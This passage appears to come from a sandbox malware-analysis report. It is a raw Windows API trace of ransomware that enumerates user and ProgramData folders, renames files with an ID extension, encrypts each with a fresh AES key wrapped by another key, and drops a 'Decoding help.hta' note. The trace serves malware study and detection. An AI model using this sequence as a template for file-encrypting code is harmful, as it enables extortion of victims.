(hObject=0x518) returned 1 [0042.073] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.073] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NTUSER.DAT") returned -1 [0042.073] lstrlenW (lpString="NTUSER.DAT") returned 10 [0042.073] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0042.073] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0042.073] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="NTUSER.DAT" | out: lpString1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" [0042.073] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" | out: lpString1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" [0042.073] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.[ID]g9uZrLhJaygpwRm1[ID]" [0042.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\ntuser.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\ntuser.dat.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x518 [0042.075] CreateFileMappingA (hFile=0x518, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x51c [0042.075] CryptAcquireContextA (in: phProv=0x64cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x64cfcec*=0x344a3d0) returned 1 [0045.319] CryptGenKey (in: hProv=0x344a3d0, Algid=0x6610, dwFlags=0x1, phKey=0x64cfce8 | out: phKey=0x64cfce8*=0x5d8990) returned 1 [0047.353] CryptExportKey (in: hKey=0x5d8990, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x64cfbe4, pdwDataLen=0x64cfce4 | out: pbData=0x64cfbe4*, pdwDataLen=0x64cfce4*=0x2c) returned 1 [0047.353] MapViewOfFile (hFileMappingObject=0x51c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc0000) returned 0xd390000 [0047.405] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x64cfbe4*, pdwDataLen=0x64cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x64cfbe4*, pdwDataLen=0x64cfcf8*=0x100) returned 1 [0047.405] CryptEncrypt (in: hKey=0x5d8990, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd390000, pdwDataLen=0x64cfce4*=0xc0000, dwBufLen=0xc0000 | out: pbData=0xd390000*, pdwDataLen=0x64cfce4*=0xc0000) returned 1 [0048.462] UnmapViewOfFile (lpBaseAddress=0xd390000) returned 1 [0048.470] CloseHandle (hObject=0x51c) returned 1 [0048.470] CryptDestroyKey (hKey=0x5d8990) returned 1 [0048.471] CryptReleaseContext (hProv=0x344a3d0, dwFlags=0x0) returned 1 [0048.471] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.471] WriteFile (in: hFile=0x518, lpBuffer=0x64cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x64cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x64cfbe4*, lpNumberOfBytesWritten=0x64cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.511] WriteFile (in: hFile=0x518, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x64cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x64cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.511] CloseHandle (hObject=0x518) returned 1 [0050.520] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.895] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xc103692e, ftCreationTime.dwHighDateTime=0x1ca0451, ftLastAccessTime.dwLowDateTime=0x1dd1880d, ftLastAccessTime.dwHighDateTime=0x1cbf8ec, ftLastWriteTime.dwLowDateTime=0x1dd1880d, ftLastWriteTime.dwHighDateTime=0x1cbf8ec, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0053.895] lstrcpyW (in: lpString1=0x2a7883b0, lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0053.895] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0053.895] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Decoding help.hta" [0053.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Decoding help.hta" (normalized: "c:\\users\\default\\decoding help.hta")) returned 0x1 [0053.895] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NTUSER.DAT.LOG") returned -1 [0053.895] lstrlenW (lpString="NTUSER.DAT.LOG") returned 14 [0053.895] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0053.895] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0053.895] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="NTUSER.DAT.LOG" | out: lpString1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" [0053.895] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" | out: lpString1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" [0053.895] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.[ID]g9uZrLhJaygpwRm1[ID]" [0053.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\ntuser.dat.log.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\ntuser.dat.log.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0058.210] CreateFileMappingA (hFile=0x6c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1d4 [0058.210] CryptAcquireContextA (in: phProv=0x64cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x64cfcec*=0x344a1b0) returned 1 [0060.184] CryptGenKey (in: hProv=0x344a1b0, Algid=0x6610, dwFlags=0x1, phKey=0x64cfce8 | out: phKey=0x64cfce8*=0x42cf358) returned 1 [0060.184] CryptExportKey (in: hKey=0x42cf358, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x64cfbe4, pdwDataLen=0x64cfce4 | out: pbData=0x64cfbe4*, pdwDataLen=0x64cfce4*=0x2c) returned 1 [0060.184] MapViewOfFile (hFileMappingObject=0x1d4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x400) returned 0x3a80000 [0063.882] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x64cfbe4*, pdwDataLen=0x64cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x64cfbe4*, pdwDataLen=0x64cfcf8*=0x100) returned 1 [0063.882] CryptEncrypt (in: hKey=0x42cf358, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a80000*, pdwDataLen=0x64cfce4*=0x400, dwBufLen=0x400 | out: pbData=0x3a80000*, pdwDataLen=0x64cfce4*=0x400) returned 1 [0063.882] UnmapViewOfFile (lpBaseAddress=0x3a80000) returned 1 [0063.884] CloseHandle (hObject=0x1d4) returned 1 [0063.884] CryptDestroyKey (hKey=0x42cf358) returned 1 [0063.884] CryptReleaseContext (hProv=0x344a1b0, dwFlags=0x0) returned 1 [0063.884] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.884] WriteFile (in: hFile=0x6c8, lpBuffer=0x64cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x64cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x64cfbe4*, lpNumberOfBytesWritten=0x64cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0063.885] WriteFile (in: hFile=0x6c8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x64cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x64cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0063.885] CloseHandle (hObject=0x6c8) returned 1 [0063.885] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0063.886] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x674ac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 Thread: id = 57 os_tid = 0xb18 [0039.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*.*", lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0039.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.328] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.328] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.328] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0039.328] lstrcmpW (lpString1=".", lpString2="Assistance") returned -1 [0039.328] lstrcmpW (lpString1="..", lpString2="Assistance") returned -1 [0039.328] lstrcmpiW (lpString1="windows", lpString2="Assistance") returned 1 [0039.330] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.330] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.330] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Assistance" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance" [0039.330] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*.*" [0039.330] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97923d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.342] CloseHandle (hObject=0x1ac) returned 1 [0039.342] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0039.342] lstrcmpW (lpString1=".", lpString2="Crypto") returned -1 [0039.343] lstrcmpW (lpString1="..", lpString2="Crypto") returned -1 [0039.343] lstrcmpiW (lpString1="windows", lpString2="Crypto") returned 1 [0039.344] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.344] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.344] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Crypto" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto" [0039.344] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*.*" [0039.344] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x980a5d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.358] CloseHandle (hObject=0x1ac) returned 1 [0039.358] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0039.358] lstrcmpW (lpString1=".", lpString2="Device Stage") returned -1 [0039.358] lstrcmpW (lpString1="..", lpString2="Device Stage") returned -1 [0039.358] lstrcmpiW (lpString1="windows", lpString2="Device Stage") returned 1 [0039.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.359] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.359] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Device Stage" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage" [0039.359] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*" [0039.359] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.359] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c48250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.375] CloseHandle (hObject=0x1ac) returned 1 [0039.375] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0039.375] lstrcmpW (lpString1=".", lpString2="DeviceSync") returned -1 [0039.375] lstrcmpW (lpString1="..", lpString2="DeviceSync") returned -1 [0039.375] lstrcmpiW (lpString1="windows", lpString2="DeviceSync") returned 1 [0039.375] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.375] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.375] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="DeviceSync" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync" [0039.375] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*.*" [0039.375] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.375] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c602b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.384] CloseHandle (hObject=0x1ac) returned 1 [0039.385] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1 [0039.385] lstrcmpW (lpString1=".", lpString2="DRM") returned -1 [0039.385] lstrcmpW (lpString1="..", lpString2="DRM") returned -1 [0039.385] lstrcmpiW (lpString1="windows", lpString2="DRM") returned 1 [0039.386] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.386] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.386] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="DRM" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM" [0039.386] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*.*" [0039.386] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98fa9e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.399] CloseHandle (hObject=0x1ac) returned 1 [0039.399] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eHome", cAlternateFileName="")) returned 1 [0039.399] lstrcmpW (lpString1=".", lpString2="eHome") returned -1 [0039.399] lstrcmpW (lpString1="..", lpString2="eHome") returned -1 [0039.399] lstrcmpiW (lpString1="windows", lpString2="eHome") returned 1 [0039.401] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.401] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.401] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="eHome" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome" [0039.401] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*.*" [0039.401] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x995ab88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.415] CloseHandle (hObject=0x1ac) returned 1 [0039.415] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0039.415] lstrcmpW (lpString1=".", lpString2="Event Viewer") returned -1 [0039.415] lstrcmpW (lpString1="..", lpString2="Event Viewer") returned -1 [0039.415] lstrcmpiW (lpString1="windows", lpString2="Event Viewer") returned 1 [0039.416] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0039.417] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0039.417] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Event Viewer" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer" [0039.417] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*.*" [0039.417] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0039.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99d2d90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.439] CloseHandle (hObject=0x1ac) returned 1 [0039.440] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0039.440] lstrcmpW (lpString1=".", lpString2="IdentityCRL") returned -1 [0039.440] lstrcmpW (lpString1="..", lpString2="IdentityCRL") returned -1 [0039.440] lstrcmpiW (lpString1="windows", lpString2="IdentityCRL") returned 1 [0039.440] lstrcatW (in: lpString1="", 